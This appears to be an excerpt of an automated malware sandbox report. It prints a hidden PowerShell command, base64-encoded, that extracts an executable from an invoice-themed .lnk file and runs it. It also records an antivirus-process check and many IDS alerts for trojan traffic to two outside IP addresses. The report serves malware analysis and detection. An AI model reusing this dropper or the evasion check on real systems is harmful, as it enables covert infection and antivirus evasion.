JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA, ProcessId: 4428, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7220, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7180, ProcessName: findstr.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-06T17:32:27.619215+010020283713Unknown Traffic192.168.11.204975185.192.60.190443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-06T17:34:02.514176+010020391031A Network Trojan was detected192.168.11.204975085.192.60.19080TCP
        2024-11-06T17:34:03.467183+010020391031A Network Trojan was detected192.168.11.2049754150.241.91.21880TCP
        2024-11-06T17:34:07.184998+010020391031A Network Trojan was detected192.168.11.2049756150.241.91.21880TCP
        2024-11-06T17:34:21.667039+010020391031A Network Trojan was detected192.168.11.2049757150.241.91.21880TCP
        2024-11-06T17:35:17.017656+010020391031A Network Trojan was detected192.168.11.2049758150.241.91.21880TCP
        2024-11-06T17:35:17.500363+010020391031A Network Trojan was detected192.168.11.2049759150.241.91.21880TCP
        2024-11-06T17:35:17.979839+010020391031A Network Trojan was detected192.168.11.2049760150.241.91.21880TCP
        2024-11-06T17:35:18.450786+010020391031A Network Trojan was detected192.168.11.2049761150.241.91.21880TCP
        2024-11-06T17:35:18.930606+010020391031A Network Trojan was detected192.168.11.2049762150.241.91.21880TCP
        2024-11-06T17:35:19.415357+010020391031A Network Trojan was detected192.168.11.2049763150.241.91.21880TCP
        2024-11-06T17:35:19.909985+010020391031A Network Trojan was detected192.168.11.2049764150.241.91.21880TCP
        2024-11-06T17:35:20.386091+010020391031A Network Trojan was detected192.168.11.2049765150.241.91.21880TCP
        2024-11-06T17:35:20.846166+010020391031A Network Trojan was detected192.168.11.2049766150.241.91.21880TCP
        2024-11-06T17:35:21.303852+010020391031A Network Trojan was detected192.168.11.2049767150.241.91.21880TCP
        2024-11-06T17:35:21.766341+010020391031A Network Trojan was detected192.168.11.2049768150.241.91.21880TCP
        2024-11-06T17:35:22.220889+010020391031A Network Trojan was detected192.168.11.2049769150.241.91.21880TCP
        2024-11-06T17:35:22.693038+010020391031A Network Trojan was detected192.168.11.2049770150.241.91.21880TCP
        2024-11-06T17:35:23.154432+010020391031A Network Trojan was detected192.168.11.2049771150.241.91.21880TCP
        2024-11-06T17:35:23.611862+010020391031A Network Trojan was detected192.168.11.2049772150.241.91.21880TCP
        2024-11-06T17:35:25.182220+010020391031A Network Trojan was detected192.168.11.2049773150.241.91.21880TCP
        2024-11-06T17:35:25.639232+010020391031A Network Trojan was detected192.168.11.2049774150.241.91.21880TCP
        2024-11-06T17:35:26.096889+010020391031A Network Trojan was detected192.168.11.2049775150.241.91.21880TCP
        2024-11-06T17:35:26.554505+010020391031A Network Trojan was detected192.168.11.2049776150.241.91.21880TCP
        2024-11-06T17:35:27.018099+010020391031A Network Trojan was detected192.168.11.2049777150.241.91.21880TCP
        2024-11-06T17:35:27.477782+010020391031A Network Trojan was detected192.168.11.2049778150.241.91.21880TCP
        2024-11-06T17:35:27.937774+010020391031A Network Trojan was detected192.168.11.2049779150.241.91.21880TCP
        2024-11-06T17:35:28.396817+010020391031A Network Trojan was detected192.168.11.2049780150.241.91.21880TCP
        2024-11-06T17:35:28.852429+010020391031A Network Trojan was detected192.168.11.2049781150.241.91.21880TCP
        2024-11-06T17:35:29.310360+010020391031A Network Trojan was detected192.168.11.2049782150.241.91.21880TCP
        2024-11-06T17:35:29.768061+010020391031A Network Trojan was detected192.168.11.2049783150.241.91.21880TCP
        2024-11-06T17:35:30.221840+010020391031A Network Trojan was detected192.168.11.2049784150.241.91.21880TCP
        2024-11-06T17:35:30.677938+010020391031A Network Trojan was detected192.168.11.2049785150.241.91.21880TCP
        2024-11-06T17:35:31.136016+010020391031A Network Trojan was detected192.168.11.2049786150.241.91.21880TCP
        2024-11-06T17:35:31.635220+010020391031A Network Trojan was detected192.168.11.2049787150.241.91.21880TCP
        2024-11-06T17:35:32.221976+010020391031A Network Trojan was detected192.168.11.2049788150.241.91.21880TCP
        2024-11-06T17:35:32.679897+010020391031A Network Trojan was detected192.168.11.2049789150.241.91.21880TCP
        2024-11-06T17:35:33.130363+010020391031A Network Trojan was detected192.168.11.2049790150.241.91.21880TCP
        2024-11-06T17:35:34.610546+010020391031A Network Trojan was detected192.168.11.2049791150.241.91.21880TCP
        2024-11-06T17:35:36.080687+010020391031A Network Trojan was detected192.168.11.2049792150.241.91.21880TCP
        2024-11-06T17:35:36.547139+010020391031A Network Trojan was detected192.168.11.2049793150.241.91.21880TCP
        2024-11-06T17:35:37.029729+010020391031A Network Trojan was detected192.168.11.2049794150.241.91.21880TCP
        2024-11-06T17:35:37.489059+010020391031A Network Trojan was detected192.168.11.2049795150.241.91.21880TCP
        2024-11-06T17:35:37.949245+010020391031A Network Trojan was detected192.168.11.2049796150.241.91.21880TCP
        2024-11-06T17:35:38.911714+010020391031A Network Trojan was detected192.168.11.2049797150.241.91.21880TCP
        2024-11-06T17:35:39.379495+010020391031A Network Trojan was detected192.168.11.2049798150.241.91.21880TCP
        2024-11-06T17:35:39.855255+010020391031A Network Trojan was detected192.168.11.2049799150.241.91.21880TCP
        2024-11-06T17:35:40.328298+010020391031A Network Trojan was detected192.168.11.2049800150.241.91.21880TCP
        2024-11-06T17:35:40.792696+010020391031A Network Trojan was detected192.168.11.2049801150.241.91.21880TCP
        2024-11-06T17:35:41.278783+010020391031A Network Trojan was detected192.168.11.2049802150.241.91.21880TCP
        2024-11-06T17:35:41.747320+010020391031A Network Trojan was detected192.168.11.2049803150.241.91.21880TCP
        2024-11-06T17:35:42.214910+010020391031A Network Trojan was detected192.168.11.2049804150.241.91.21880TCP
        2024-11-06T17:35:42.697491+010020391031A Network Trojan was detected192.168.11.2049805150.241.91.21880TCP
        2024-11-06T17:35:43.179463+010020391031A Network Trojan was detected192.168.11.2049806150.241.91.21880TCP
        2024-11-06T17:35:43.649478+010020391031A Network Trojan was detected192.168.11.2049807150.241.91.21880TCP
        2024-11-06T17:35:44.109789+010020391031A Network Trojan was detected192.168.11.2049808150.241.91.21880TCP
        2024-11-06T17:35:44.568380+010020391031A Network Trojan was detected192.168.11.2049809150.241.91.21880TCP
        2024-11-06T17:35:45.046236+010020391031A Network Trojan was detected192.168.11.2049810150.241.91.21880TCP
        2024-11-06T17:35:45.505993+010020391031A Network Trojan was detected192.168.11.2049811150.241.91.21880TCP
        2024-11-06T17:35:45.963192+010020391031A Network Trojan was detected192.168.11.2049812150.241.91.21880TCP
        2024-11-06T17:35:46.419959+010020391031A Network Trojan was detected192.168.11.2049813150.241.91.21880TCP
        2024-11-06T17:35:46.891161+010020391031A Network Trojan was detected192.168.11.2049814150.241.91.21880TCP
        2024-11-06T17:35:48.367545+010020391031A Network Trojan was detected192.168.11.2049815150.241.91.21880TCP
        2024-11-06T17:35:48.823587+010020391031A Network Trojan was detected192.168.11.2049816150.241.91.21880TCP
        2024-11-06T17:35:49.284385+010020391031A Network Trojan was detected192.168.11.2049817150.241.91.21880TCP
        2024-11-06T17:35:49.741815+010020391031A Network Trojan was detected192.168.11.2049818150.241.91.21880TCP
        2024-11-06T17:35:50.207866+010020391031A Network Trojan was detected192.168.11.2049819150.241.91.21880TCP
        2024-11-06T17:35:50.965666+010020391031A Network Trojan was detected192.168.11.2049820150.241.91.21880TCP
        2024-11-06T17:35:51.422342+010020391031A Network Trojan was detected192.168.11.2049821150.241.91.21880TCP
        2024-11-06T17:35:51.879269+010020391031A Network Trojan was detected192.168.11.2049822150.241.91.21880TCP
        2024-11-06T17:35:52.340188+010020391031A Network Trojan was detected192.168.11.2049823150.241.91.21880TCP
        2024-11-06T17:35:52.807634+010020391031A Network Trojan was detected192.168.11.2049824150.241.91.21880TCP
        2024-11-06T17:35:53.302335+010020391031A Network Trojan was detected192.168.11.2049825150.241.91.21880TCP
        2024-11-06T17:35:53.885092+010020391031A Network Trojan was detected192.168.11.2049826150.241.91.21880TCP
        2024-11-06T17:35:54.380246+010020391031A Network Trojan was detected192.168.11.2049827150.241.91.21880TCP
        2024-11-06T17:35:54.964844+010020391031A Network Trojan was detected192.168.11.2049828150.241.91.21880TCP
        2024-11-06T17:35:55.422175+010020391031A Network Trojan was detected192.168.11.2049829150.241.91.21880TCP
        2024-11-06T17:35:55.879588+010020391031A Network Trojan was detected192.168.11.2049830150.241.91.21880TCP
        2024-11-06T17:35:56.337590+010020391031A Network Trojan was detected192.168.11.2049831150.241.91.21880TCP
        2024-11-06T17:35:56.796347+010020391031A Network Trojan was detected192.168.11.2049832150.241.91.21880TCP
        2024-11-06T17:35:57.259246+010020391031A Network Trojan was detected192.168.11.2049833150.241.91.21880TCP
        2024-11-06T17:35:57.721568+010020391031A Network Trojan was detected192.168.11.2049834150.241.91.21880TCP
        2024-11-06T17:35:58.179827+010020391031A Network Trojan was detected192.168.11.2049835150.241.91.21880TCP
        2024-11-06T17:35:58.633562+010020391031A Network Trojan was detected192.168.11.2049836150.241.91.21880TCP
        2024-11-06T17:35:59.222957+010020391031A Network Trojan was detected192.168.11.2049837150.241.91.21880TCP
        2024-11-06T17:35:59.814945+010020391031A Network Trojan was detected192.168.11.2049838150.241.91.21880TCP
        2024-11-06T17:36:00.282421+010020391031A Network Trojan was detected192.168.11.2049839150.241.91.21880TCP
        2024-11-06T17:36:00.785100+010020391031A Network Trojan was detected192.168.11.2049840150.241.91.21880TCP
        2024-11-06T17:36:01.372351+010020391031A Network Trojan was detected192.168.11.2049841150.241.91.21880TCP
        2024-11-06T17:36:01.831399+010020391031A Network Trojan was detected192.168.11.2049842150.241.91.21880TCP
        2024-11-06T17:36:02.284264+010020391031A Network Trojan was detected192.168.11.2049843150.241.91.21880TCP
        2024-11-06T17:36:02.742007+010020391031A Network Trojan was detected192.168.11.2049844150.241.91.21880TCP
        2024-11-06T17:36:03.205587+010020391031A Network Trojan was detected192.168.11.2049845150.241.91.21880TCP
        2024-11-06T17:36:03.667321+010020391031A Network Trojan was detected192.168.11.2049846150.241.91.21880TCP
        2024-11-06T17:36:04.126549+010020391031A Network Trojan was detected192.168.11.2049847150.241.91.21880TCP
        2024-11-06T17:36:04.583631+010020391031A Network Trojan was detected192.168.11.2049848150.241.91.21880TCP
        2024-11-06T17:36:05.040710+010020391031A Network Trojan was detected192.168.11.2049849150.241.91.21880TCP
        2024-11-06T17:36:06.507060+010020391031A Network Trojan was detected192.168.11.2049850150.241.91.21880TCP
        2024-11-06T17:36:06.971360+010020391031A Network Trojan was detected192.168.11.2049851150.241.91.21880TCP
        2024-11-06T17:36:07.431464+010020391031A Network Trojan was detected192.168.11.2049852150.241.91.21880TCP
        2024-11-06T17:36:07.891153+010020391031A Network Trojan was detected192.168.11.2049853150.241.91.21880TCP
        2024-11-06T17:36:08.400268+010020391031A Network Trojan was detected192.168.11.2049854150.241.91.21880TCP
        2024-11-06T17:36:08.857186+010020391031A Network Trojan was detected192.168.11.2049855150.241.91.21880TCP
        2024-11-06T17:36:09.320971+010020391031A Network Trojan was detected192.168.11.2049856150.241.91.21880TCP
        2024-11-06T17:36:09.780413+010020391031A Network Trojan was detected192.168.11.2049857150.241.91.21880TCP
        2024-11-06T17:36:10.240782+010020391031A Network Trojan was detected192.168.11.2049858150.241.91.21880TCP
        2024-11-06T17:36:10.695118+010020391031A Network Trojan was detected192.168.11.2049859150.241.91.21880TCP
        2024-11-06T17:36:11.154104+010020391031A Network Trojan was detected192.168.11.2049860150.241.91.21880TCP
        2024-11-06T17:36:11.642237+010020391031A Network Trojan was detected192.168.11.2049861150.241.91.21880TCP
        2024-11-06T17:36:12.243645+010020391031A Network Trojan was detected192.168.11.2049862150.241.91.21880TCP
        2024-11-06T17:36:12.695295+010020391031A Network Trojan was detected192.168.11.2049863150.241.91.21880TCP
        2024-11-06T17:36:13.157417+010020391031A Network Trojan was detected192.168.11.2049864150.241.91.21880TCP
        2024-11-06T17:36:13.621061+010020391031A Network Trojan was detected192.168.11.2049865150.241.91.21880TCP
        2024-11-06T17:36:14.081684+010020391031A Network Trojan was detected192.168.11.2049866150.241.91.21880TCP
        2024-11-06T17:36:14.540059+010020391031A Network Trojan was detected192.168.11.2049867150.241.91.21880TCP
        2024-11-06T17:36:15.001352+010020391031A Network Trojan was detected192.168.11.2049868150.241.91.21880TCP
        2024-11-06T17:36:15.457649+010020391031A Network Trojan was detected192.168.11.2049869150.241.91.21880TCP
        2024-11-06T17:36:15.917233+010020391031A Network Trojan was detected192.168.11.2049870150.241.91.21880TCP
        2024-11-06T17:36:16.380347+010020391031A Network Trojan was detected192.168.11.2049871150.241.91.21880TCP
        2024-11-06T17:36:16.930961+010020391031A Network Trojan was detected192.168.11.2049872150.241.91.21880TCP
        2024-11-06T17:36:17.386751+010020391031A Network Trojan was detected192.168.11.2049873150.241.91.21880TCP
        2024-11-06T17:36:17.844236+010020391031A Network Trojan was detected192.168.11.2049874150.241.91.21880TCP
        2024-11-06T17:36:18.606434+010020391031A Network Trojan was detected192.168.11.2049875150.241.91.21880TCP
        2024-11-06T17:36:19.069230+010020391031A Network Trojan was detected192.168.11.2049876150.241.91.21880TCP
        2024-11-06T17:36:19.530492+010020391031A Network Trojan was detected192.168.11.2049877150.241.91.21880TCP
        2024-11-06T17:36:19.990490+010020391031A Network Trojan was detected192.168.11.2049878150.241.91.21880TCP
        2024-11-06T17:36:20.447587+010020391031A Network Trojan was detected192.168.11.2049879150.241.91.21880TCP
        2024-11-06T17:36:20.907343+010020391031A Network Trojan was detected192.168.11.2049880150.241.91.21880TCP
        2024-11-06T17:36:21.365320+010020391031A Network Trojan was detected192.168.11.2049881150.241.91.21880TCP
        2024-11-06T17:36:21.832151+010020391031A Network Trojan was detected192.168.11.2049882150.241.91.21880TCP
        2024-11-06T17:36:22.300362+010020391031A Network Trojan was detected192.168.11.2049883150.241.91.21880TCP
        2024-11-06T17:36:22.766851+010020391031A Network Trojan was detected192.168.11.2049884150.241.91.21880TCP
        2024-11-06T17:36:23.528542+010020391031A Network Trojan was detected192.168.11.2049885150.241.91.21880TCP
        2024-11-06T17:36:23.992416+010020391031A Network Trojan was detected192.168.11.2049886150.241.91.21880TCP
        2024-11-06T17:36:24.456756+010020391031A Network Trojan was detected192.168.11.2049887150.241.91.21880TCP
        2024-11-06T17:36:24.914557+010020391031A Network Trojan was detected192.168.11.2049888150.241.91.21880TCP
        2024-11-06T17:36:25.375959+010020391031A Network Trojan was detected192.168.11.2049889150.241.91.21880TCP
        2024-11-06T17:36:25.825974+010020391031A Network Trojan was detected192.168.11.2049890150.241.91.21880TCP
        2024-11-06T17:36:26.287583+010020391031A Network Trojan was detected192.168.11.2049891150.241.91.21880TCP
        2024-11-06T17:36:26.749001+010020391031A Network Trojan was detected192.168.11.2049892150.241.91.21880TCP
        2024-11-06T17:36:27.211065+010020391031A Network Trojan was detected192.168.11.2049893150.241.91.21880TCP
        2024-11-06T17:36:27.667664+010020391031A Network Trojan was detected192.168.11.2049894150.241.91.21880TCP
        2024-11-06T17:36:28.129541+010020391031A Network Trojan was detected192.168.11.2049895150.241.91.21880TCP
        2024-11-06T17:36:28.586711+010020391031A Network Trojan was detected192.168.11.2049896150.241.91.21880TCP
        2024-11-06T17:36:29.153420+010020391031A Network Trojan was detected192.168.11.2049897150.241.91.21880TCP
        2024-11-06T17:36:29.608546+010020391031A Network Trojan was detected192.168.11.2049898150.241.91.21880TCP
        2024-11-06T17:36:30.062080+010020391031A Network Trojan was detected192.168.11.2049899150.241.91.21880TCP
        2024-11-06T17:36:30.517141+010020391031A Network Trojan was detected192.168.11.2049900150.241.91.21880TCP
        2024-11-06T17:36:30.981366+010020391031A Network Trojan was detected192.168.11.2049901150.241.91.21880TCP
        2024-11-06T17:36:31.440412+010020391031A Network Trojan was detected192.168.11.2049902150.241.91.21880TCP
        2024-11-06T17:36:31.907741+010020391031A Network Trojan was detected192.168.11.2049903150.241.91.21880TCP
        2024-11-06T17:36:32.370906+010020391031A Network Trojan was detected192.168.11.2049904150.241.91.21880TCP
        2024-11-06T17:36:32.829239+010020391031A Network Trojan was detected192.168.11.2049905150.241.91.21880TCP
        2024-11-06T17:36:33.287179+010020391031A Network Trojan was detected192.168.11.2049906150.241.91.21880TCP
        2024-11-06T17:36:33.745460+010020391031A Network Trojan was detected192.168.11.2049907150.241.91.21880TCP
        2024-11-06T17:36:34.217787+010020391031A Network Trojan was detected192.168.11.2049908150.241.91.21880TCP
        2024-11-06T17:36:34.681858+010020391031A Network Trojan was detected192.168.11.2049909150.241.91.21880TCP
        2024-11-06T17:36:35.137011+010020391031A Network Trojan was detected192.168.11.2049910150.241.91.21880TCP
        2024-11-06T17:36:35.605601+010020391031A Network Trojan was detected192.168.11.2049911150.241.91.21880TCP
        2024-11-06T17:36:36.061565+010020391031A Network Trojan was detected192.168.11.2049912150.241.91.21880TCP
        2024-11-06T17:36:37.529668+010020391031A Network Trojan was detected192.168.11.2049913150.241.91.21880TCP
        2024-11-06T17:36:37.984436+010020391031A Network Trojan was detected192.168.11.2049914150.241.91.21880TCP
        2024-11-06T17:36:38.450847+010020391031A Network Trojan was detected192.168.11.2049915150.241.91.21880TCP
        2024-11-06T17:36:38.910832+010020391031A Network Trojan was detected192.168.11.2049916150.241.91.21880TCP
        2024-11-06T17:36:39.367009+010020391031A Network Trojan was detected192.168.11.2049917150.241.91.21880TCP
        2024-11-06T17:36:39.828626+010020391031A Network Trojan was detected192.168.11.2049918150.241.91.21880TCP
        2024-11-06T17:36:40.293209+010020391031A Network Trojan was detected192.168.11.2049919150.241.91.21880TCP
        2024-11-06T17:36:40.762277+010020391031A Network Trojan was detected192.168.11.2049920150.241.91.21880TCP
        2024-11-06T17:36:42.238534+010020391031A Network Trojan was detected192.168.11.2049921150.241.91.21880TCP
        2024-11-06T17:36:43.706033+010020391031A Network Trojan was detected192.168.11.2049922150.241.91.21880TCP
        2024-11-06T17:36:44.164435+010020391031A Network Trojan was detected192.168.11.2049923150.241.91.21880TCP
        2024-11-06T17:36:44.624654+010020391031A Network Trojan was detected192.168.11.2049924150.241.91.21880TCP
        2024-11-06T17:36:45.082745+010020391031A Network Trojan was detected192.168.11.2049925150.241.91.21880TCP
        2024-11-06T17:36:45.572178+010020391031A Network Trojan was detected192.168.11.2049926150.241.91.21880TCP
        2024-11-06T17:36:46.169364+010020391031A Network Trojan was detected192.168.11.2049927150.241.91.21880TCP
        2024-11-06T17:36:46.625033+010020391031A Network Trojan was detected192.168.11.2049928150.241.91.21880TCP
        2024-11-06T17:36:47.083453+010020391031A Network Trojan was detected192.168.11.2049929150.241.91.21880TCP
        2024-11-06T17:36:47.542219+010020391031A Network Trojan was detected192.168.11.2049930150.241.91.21880TCP
        2024-11-06T17:36:47.999356+010020391031A Network Trojan was detected192.168.11.2049931150.241.91.21880TCP
        2024-11-06T17:36:48.455625+010020391031A Network Trojan was detected192.168.11.2049932150.241.91.21880TCP
        2024-11-06T17:36:49.915111+010020391031A Network Trojan was detected192.168.11.2049933150.241.91.21880TCP
        2024-11-06T17:36:50.686463+010020391031A Network Trojan was detected192.168.11.2049934150.241.91.21880TCP
        2024-11-06T17:36:51.152813+010020391031A Network Trojan was detected192.168.11.2049935150.241.91.21880TCP
        2024-11-06T17:36:51.620309+010020391031A Network Trojan was detected192.168.11.2049936150.241.91.21880TCP
        2024-11-06T17:36:52.077518+010020391031A Network Trojan was detected192.168.11.2049937150.241.91.21880TCP
        2024-11-06T17:36:52.547864+010020391031A Network Trojan was detected192.168.11.2049938150.241.91.21880TCP
        2024-11-06T17:36:53.016510+010020391031A Network Trojan was detected192.168.11.2049939150.241.91.21880TCP
        2024-11-06T17:36:54.523465+010020391031A Network Trojan was detected192.168.11.2049940150.241.91.21880TCP
        2024-11-06T17:36:55.120789+010020391031A Network Trojan was detected192.168.11.2049941150.241.91.21880TCP
        2024-11-06T17:36:55.598247+010020391031A Network Trojan was detected192.168.11.2049942150.241.91.21880TCP
        2024-11-06T17:36:56.069535+010020391031A Network Trojan was detected192.168.11.2049943150.241.91.21880TCP
        2024-11-06T17:36:56.639446+010020391031A Network Trojan was detected192.168.11.2049944150.241.91.21880TCP
        2024-11-06T17:36:57.419972+010020391031A Network Trojan was detected192.168.11.2049945150.241.91.21880TCP
        2024-11-06T17:36:58.915639+010020391031A Network Trojan was detected192.168.11.2049946150.241.91.21880TCP
        2024-11-06T17:36:59.380528+010020391031A Network Trojan was detected192.168.11.2049947150.241.91.21880TCP
        2024-11-06T17:36:59.859999+010020391031A Network Trojan was detected192.168.11.2049948150.241.91.21880TCP
        2024-11-06T17:37:00.323540+010020391031A Network Trojan was detected192.168.11.2049949150.241.91.21880TCP
        2024-11-06T17:37:01.785360+010020391031A Network Trojan was detected192.168.11.2049950150.241.91.21880TCP
        2024-11-06T17:37:02.252696+010020391031A Network Trojan was detected192.168.11.2049951150.241.91.21880TCP
        2024-11-06T17:37:02.713485+010020391031A Network Trojan was detected192.168.11.2049952150.241.91.21880TCP
        2024-11-06T17:37:04.191903+010020391031A Network Trojan was detected192.168.11.2049953150.241.91.21880TCP
        2024-11-06T17:37:04.655224+010020391031A Network Trojan was detected192.168.11.2049954150.241.91.21880TCP
        2024-11-06T17:37:05.113277+010020391031A Network Trojan was detected192.168.11.2049955150.241.91.21880TCP
        2024-11-06T17:37:05.573157+010020391031A Network Trojan was detected192.168.11.2049956150.241.91.21880TCP
        2024-11-06T17:37:06.034876+010020391031A Network Trojan was detected192.168.11.2049957150.241.91.21880TCP
        2024-11-06T17:37:06.496948+010020391031A Network Trojan was detected192.168.11.2049958150.241.91.21880TCP
        2024-11-06T17:37:06.953975+010020391031A Network Trojan was detected192.168.11.2049959150.241.91.21880TCP
        2024-11-06T17:37:08.433062+010020391031A Network Trojan was detected192.168.11.2049960150.241.91.21880TCP
        2024-11-06T17:37:08.893219+010020391031A Network Trojan was detected192.168.11.2049961150.241.91.21880TCP
        2024-11-06T17:37:09.352452+010020391031A Network Trojan was detected192.168.11.2049962150.241.91.21880TCP
        2024-11-06T17:37:09.810313+010020391031A Network Trojan was detected192.168.11.2049963150.241.91.21880TCP
        2024-11-06T17:37:10.267073+010020391031A Network Trojan was detected192.168.11.2049964150.241.91.21880TCP
        2024-11-06T17:37:10.737480+010020391031A Network Trojan was detected192.168.11.2049965150.241.91.21880TCP
        2024-11-06T17:37:11.205698+010020391031A Network Trojan was detected192.168.11.2049966150.241.91.21880TCP
        2024-11-06T17:37:11.662120+010020391031A Network Trojan was detected192.168.11.2049967150.241.91.21880TCP
        2024-11-06T17:37:12.126771+010020391031A Network Trojan was detected192.168.11.2049968150.241.91.21880TCP
        2024-11-06T17:37:12.581427+010020391031A Network Trojan was detected192.168.11.2049969150.241.91.21880TCP
        2024-11-06T17:37:13.037888+010020391031A Network Trojan was detected192.168.11.2049970150.241.91.21880TCP
        2024-11-06T17:37:13.508935+010020391031A Network Trojan was detected192.168.11.2049971150.241.91.21880TCP
        2024-11-06T17:37:13.978066+010020391031A Network Trojan was detected192.168.11.2049972150.241.91.21880TCP
        2024-11-06T17:37:15.449668+010020391031A Network Trojan was detected192.168.11.2049973150.241.91.21880TCP
        2024-11-06T17:37:15.915281+010020391031A Network Trojan was detected192.168.11.2049974150.241.91.21880TCP
        2024-11-06T17:37:16.372901+010020391031A Network Trojan was detected192.168.11.2049975150.241.91.21880TCP
        2024-11-06T17:37:16.830025+010020391031A Network Trojan was detected192.168.11.2049976150.241.91.21880TCP
        2024-11-06T17:37:17.295648+010020391031A Network Trojan was detected192.168.11.2049977150.241.91.21880TCP
        2024-11-06T17:37:17.752439+010020391031A Network Trojan was detected192.168.11.2049978150.241.91.21880TCP
        2024-11-06T17:37:18.210581+010020391031A Network Trojan was detected192.168.11.2049979150.241.91.21880TCP
        2024-11-06T17:37:18.674460+010020391031A Network Trojan was detected192.168.11.2049980150.241.91.21880TCP
        2024-11-06T17:37:19.139602+010020391031A Network Trojan was detected192.168.11.2049981150.241.91.21880TCP
        2024-11-06T17:37:19.604950+010020391031A Network Trojan was detected192.168.11.2049982150.241.91.21880TCP
        2024-11-06T17:37:20.062713+010020391031A Network Trojan was detected192.168.11.2049983150.241.91.21880TCP
        2024-11-06T17:37:20.521745+010020391031A Network Trojan was detected192.168.11.2049984150.241.91.21880TCP
        2024-11-06T17:37:20.988160+010020391031A Network Trojan was detected192.168.11.2049985150.241.91.21880TCP
        2024-11-06T17:37:21.455350+010020391031A Network Trojan was detected192.168.11.2049986150.241.91.21880TCP
        2024-11-06T17:37:21.914404+010020391031A Network Trojan was detected192.168.11.2049987150.241.91.21880TCP
        2024-11-06T17:37:22.379221+010020391031A Network Trojan was detected192.168.11.2049988150.241.91.21880TCP
        2024-11-06T17:37:22.847515+010020391031A Network Trojan was detected192.168.11.2049989150.241.91.21880TCP
        2024-11-06T17:37:23.306282+010020391031A Network Trojan was detected192.168.11.2049990150.241.91.21880TCP
        2024-11-06T17:37:24.080697+010020391031A Network Trojan was detected192.168.11.2049991150.241.91.21880TCP
        2024-11-06T17:37:24.536606+010020391031A Network Trojan was detected192.168.11.2049992150.241.91.21880TCP
        2024-11-06T17:37:24.995369+010020391031A Network Trojan was detected192.168.11.2049993150.241.91.21880TCP
        2024-11-06T17:37:25.457630+010020391031A Network Trojan was detected192.168.11.2049994150.241.91.21880TCP
        2024-11-06T17:37:25.914520+010020391031A Network Trojan was detected192.168.11.2049995150.241.91.21880TCP
        2024-11-06T17:37:26.371297+010020391031A Network Trojan was detected192.168.11.2049996150.241.91.21880TCP
        2024-11-06T17:37:26.843219+010020391031A Network Trojan was detected192.168.11.2049997150.241.91.21880TCP
        2024-11-06T17:37:27.360056+010020391031A Network Trojan was detected192.168.11.2049998150.241.91.21880TCP
        2024-11-06T17:37:27.947929+010020391031A Network Trojan was detected192.168.11.2049999150.241.91.21880TCP
        2024-11-06T17:37:28.400844+010020391031A Network Trojan was detected192.168.11.2050000150.241.91.21880TCP
        2024-11-06T17:37:28.855483+010020391031A Network Trojan was detected192.168.11.2050001150.241.91.21880TCP
        2024-11-06T17:37:29.359571+010020391031A Network Trojan was detected192.168.11.2050002150.241.91.21880TCP
        2024-11-06T17:37:29.970862+010020391031A Network Trojan was detected192.168.11.2050003150.241.91.21880TCP
        2024-11-06T17:37:30.451952+010020391031A Network Trojan was detected192.168.11.2050004150.241.91.21880TCP
        2024-11-06T17:37:30.914569+010020391031A Network Trojan was detected192.168.11.2050005150.241.91.21880TCP
